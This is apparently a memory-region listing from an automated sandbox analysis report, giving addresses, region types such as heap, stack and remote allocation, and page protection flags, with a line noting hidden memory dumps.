|
1E4000
|
heap
|
page read and write
|
||
|
15B9000
|
heap
|
page read and write
|
||
|
15D3000
|
heap
|
page read and write
|
||
|
224F000
|
stack
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
BDE14FE000
|
unkown
|
page readonly
|
||
|
24B08ED0000
|
trusted library allocation
|
page read and write
|
||
|
24B039D0000
|
trusted library allocation
|
page read and write
|
||
|
24B0904A000
|
heap
|
page read and write
|
||
|
51EC000
|
unclassified section
|
page readonly
|
||
|
11B1000
|
heap
|
page read and write
|
||
|
3FD1000
|
heap
|
page read and write
|
||
|
11BD000
|
heap
|
page read and write
|
||
|
24B09230000
|
trusted library allocation
|
page read and write
|
||
|
17B5000
|
heap
|
page read and write
|
||
|
24B08F61000
|
trusted library allocation
|
page read and write
|
||
|
24B0924D000
|
trusted library allocation
|
page read and write
|
||
|
24B090BB000
|
heap
|
page read and write
|
||
|
F80000
|
direct allocation
|
page execute and read and write
|
||
|
552000
|
unkown
|
page readonly
|
||
|
42A0000
|
remote allocation
|
page read and write
|
||
|
24B0903D000
|
heap
|
page read and write
|
||
|
552000
|
unkown
|
page readonly
|
||
|
24B092E8000
|
trusted library allocation
|
page read and write
|
||
|
1810000
|
heap
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
1569000
|
heap
|
page read and write
|
||
|
62C0000
|
remote allocation
|
page read and write
|
||
|
15D3000
|
heap
|
page read and write
|
||
|
5CB000
|
unkown
|
page readonly
|
||
|
BDE12FE000
|
unkown
|
page readonly
|
||
|
54BD000
|
trusted library allocation
|
page read and write
|
||
|
410C000
|
stack
|
page read and write
|
||
|
52C4000
|
trusted library allocation
|
page read and write
|
||
|
15CD000
|
heap
|
page read and write
|
||
|
11D7000
|
heap
|
page read and write
|
||
|
24B09307000
|
trusted library allocation
|
page read and write
|
||
|
24B092F4000
|
trusted library allocation
|
page read and write
|
||
|
5AC000
|
unkown
|
page read and write
|
||
|
24B03A3F000
|
heap
|
page read and write
|
||
|
100E000
|
stack
|
page read and write
|
||
|
FD0000
|
trusted library allocation
|
page read and write
|
||
|
BDE1DFE000
|
stack
|
page read and write
|
||
|
BDE29FE000
|
unkown
|
page readonly
|
||
|
24B092C2000
|
trusted library allocation
|
page read and write
|
||
|
1E4000
|
heap
|
page read and write
|
||
|
24B04EA1000
|
trusted library allocation
|
page read and write
|
||
|
1E4000
|
heap
|
page read and write
|
||
|
5386000
|
trusted library allocation
|
page read and write
|
||
|
24B09272000
|
trusted library allocation
|
page read and write
|
||
|
7850000
|
heap
|
page read and write
|
||
|
11F1000
|
heap
|
page read and write
|
||
|
1638000
|
heap
|
page read and write
|
||
|
24B04B30000
|
trusted library section
|
page readonly
|
||
|
11DF000
|
heap
|
page read and write
|
||
|
24B092F0000
|
remote allocation
|
page read and write
|
||
|
15D8000
|
heap
|
page read and write
|
||
|
15D8000
|
heap
|
page read and write
|
||
|
24B090FA000
|
heap
|
page read and write
|
||
|
BDE24FE000
|
unkown
|
page readonly
|
||
|
24B0902B000
|
heap
|
page read and write
|
||
|
BDE26FD000
|
stack
|
page read and write
|
||
|
1610000
|
heap
|
page read and write
|
||
|
5C1000
|
unkown
|
page readonly
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
18B3000
|
heap
|
page read and write
|
||
|
15D0000
|
heap
|
page read and write
|
||
|
3FD1000
|
heap
|
page read and write
|
||
|
51F4000
|
unclassified section
|
page read and write
|
||
|
6EAD000
|
stack
|
page read and write
|
||
|
24B09000000
|
heap
|
page read and write
|
||
|
BDE22FE000
|
unkown
|
page readonly
|
||
|
528D000
|
stack
|
page read and write
|
||
|
1718000
|
heap
|
page read and write
|
||
|
BDE28FD000
|
stack
|
page read and write
|
||
|
11B3000
|
heap
|
page read and write
|
||
|
24B08F60000
|
trusted library allocation
|
page read and write
|
||
|
5BA000
|
unkown
|
page read and write
|
||
|
131A000
|
heap
|
page read and write
|
||
|
1E4000
|
heap
|
page read and write
|
||
|
15FC000
|
heap
|
page read and write
|
||
|
15EF000
|
heap
|
page read and write
|
||
|
3FE0000
|
heap
|
page read and write
|
||
|
BDE23FD000
|
stack
|
page read and write
|
||
|
24B0920E000
|
trusted library allocation
|
page read and write
|
||
|
424D000
|
stack
|
page read and write
|
||
|
15FC000
|
heap
|
page read and write
|
||
|
24B03B02000
|
heap
|
page read and write
|
||
|
24B0900D000
|
heap
|
page read and write
|
||
|
24B04B50000
|
trusted library section
|
page readonly
|
||
|
10D0000
|
heap
|
page read and write
|
||
|
24B03A91000
|
heap
|
page read and write
|
||
|
24B09085000
|
heap
|
page read and write
|
||
|
1818000
|
heap
|
page read and write
|
||
|
15D8000
|
heap
|
page read and write
|
||
|
1E4000
|
heap
|
page read and write
|
||
|
24B03A2B000
|
heap
|
page read and write
|
||
|
F0E000
|
stack
|
page read and write
|
||
|
BDE21FE000
|
unkown
|
page readonly
|
||
|
11D4000
|
heap
|
page read and write
|
||
|
24B0931A000
|
trusted library allocation
|
page read and write
|
||
|
24B04200000
|
heap
|
page read and write
|
||
|
15D8000
|
heap
|
page read and write
|
||
|
111E000
|
heap
|
page read and write
|
||
|
1219000
|
heap
|
page read and write
|
||
|
1638000
|
heap
|
page read and write
|
||
|
3FD1000
|
heap
|
page read and write
|
||
|
BDE257E000
|
stack
|
page read and write
|
||
|
BDE095B000
|
stack
|
page read and write
|
||
|
F0E000
|
stack
|
page read and write
|
||
|
F4E000
|
stack
|
page read and write
|
||
|
1E4000
|
heap
|
page read and write
|
||
|
24B04A20000
|
trusted library allocation
|
page read and write
|
||
|
4130000
|
heap
|
page read and write
|
||
|
15B9000
|
heap
|
page read and write
|
||
|
24B08F80000
|
trusted library allocation
|
page read and write
|
||
|
BDE0FFE000
|
unkown
|
page readonly
|
||
|
24B04202000
|
heap
|
page read and write
|
||
|
1595000
|
heap
|
page read and write
|
||
|
51A1000
|
unclassified section
|
page execute read
|
||
|
172D000
|
heap
|
page read and write
|
||
|
15B9000
|
heap
|
page read and write
|
||
|
10C4000
|
heap
|
page read and write
|
||
|
BDE2FFE000
|
unkown
|
page readonly
|
||
|
BDE27FE000
|
unkown
|
page readonly
|
||
|
1722000
|
heap
|
page read and write
|
||
|
24B090C3000
|
heap
|
page read and write
|
||
|
51FF000
|
unclassified section
|
page readonly
|
||
|
BDE19FE000
|
unkown
|
page readonly
|
||
|
401000
|
unkown
|
page execute read
|
||
|
401000
|
unkown
|
page execute read
|
||
|
601000
|
unkown
|
page readonly
|
||
|
1638000
|
heap
|
page read and write
|
||
|
1E4000
|
heap
|
page read and write
|
||
|
1557000
|
heap
|
page read and write
|
||
|
42EE000
|
stack
|
page read and write
|
||
|
5AC000
|
unkown
|
page write copy
|
||
|
15B9000
|
heap
|
page read and write
|
||
|
11BD000
|
heap
|
page read and write
|
||
|
171F000
|
heap
|
page read and write
|
||
|
BDE1CFE000
|
unkown
|
page readonly
|
||
|
100000
|
heap
|
page read and write
|
||
|
10D1000
|
heap
|
page read and write
|
||
|
24B08EC0000
|
trusted library allocation
|
page read and write
|
||
|
24B092FF000
|
trusted library allocation
|
page read and write
|
||
|
24B09208000
|
trusted library allocation
|
page read and write
|
||
|
62BE000
|
stack
|
page read and write
|
||
|
62C0000
|
remote allocation
|
page read and write
|
||
|
ECD000
|
stack
|
page read and write
|
||
|
24B090FC000
|
heap
|
page read and write
|
||
|
24B03ABE000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
15B9000
|
heap
|
page read and write
|
||
|
153A000
|
heap
|
page read and write
|
||
|
24B03A00000
|
heap
|
page read and write
|
||
|
51EF000
|
unclassified section
|
page write copy
|
||
|
42A0000
|
remote allocation
|
page read and write
|
||
|
1712000
|
heap
|
page read and write
|
||
|
1712000
|
heap
|
page read and write
|
||
|
601000
|
unkown
|
page readonly
|
||
|
24B09215000
|
trusted library allocation
|
page read and write
|
||
|
202F000
|
stack
|
page read and write
|
||
|
15C7000
|
heap
|
page read and write
|
There are 422 hidden memdumps, click here to show them.